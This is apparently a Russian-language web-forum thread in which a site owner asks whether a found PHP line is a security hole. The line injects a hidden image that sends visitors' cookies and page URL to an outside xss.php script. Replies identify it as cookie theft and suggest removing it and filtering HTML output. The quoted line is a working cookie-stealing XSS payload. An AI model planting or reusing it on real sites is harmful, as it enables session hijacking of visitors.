Помощь по скриптам | Вопрос к знающим
Лара
Вот нашел такую хрень
echo '<script>$(\'body\').append(\'<img style="display: none;" src="http://сайт/xss.php?fuck=\'+document.cookie+\'&url=\'+document.location.href+\'" />\');</script>';
В полной обьяве это дырка? файл на который ведет урл не существует
melkij echo '<script>$(\'body\').append(\'<img style="display: none;" src="http://сайт/xss.php?fuck=\'+document.cookie+\'&url=\'+document.location.href+\'" />\');</script>';
В полной обьяве это дырка? файл на который ведет урл не существует
Походу отправляет куки на сайт какой то . хз. Не знаю. Не кодер, не шарю 
________
посл. ред. 16.02.2018 в 16:17; всего 3 раз(а); by OZZY
OZZY
________
посл. ред. 16.02.2018 в 16:17; всего 3 раз(а); by OZZY
OZZY , Странно
Удали
Venum 
а вот, что оно делает, не трудно догадаться по словам, содержащимся в url
Автор тебе советую фильтруй html. То есть лови через ob_start и фильтр опасные теги и символы
JMCode
[J]ungle (16.02.2018 в 17:08)
Автор тебе советую фильтруй html. То есть лови через ob_start и фильтр опасные теги и символы
Автор тебе советую фильтруй html. То есть лови через ob_start и фильтр опасные теги и символы
при чём тут это, если данный код будет работать только при условии, что на сайте подключена библиотека jquery
PhpStorm , ишеш ссылку http если не являет своим сайтом то блокировать это уже можно напрямую html получать и изменить.. А дальше уже через html не поставиш отработку данные для сайта
[J]ungle (16.02.2018 в 17:17)
PhpStorm , ишеш ссылку http если не являет своим сайтом то блокировать это уже можно напрямую html получать и изменить.. А дальше уже через html не поставиш отработку данные для сайта
PhpStorm , ишеш ссылку http если не являет своим сайтом то блокировать это уже можно напрямую html получать и изменить.. А дальше уже через html не поставиш отработку данные для сайта
это не ссылка, это "картинка"
________
посл. ред. 16.02.2018 в 17:19; всего 1 раз(а); by PhpStorm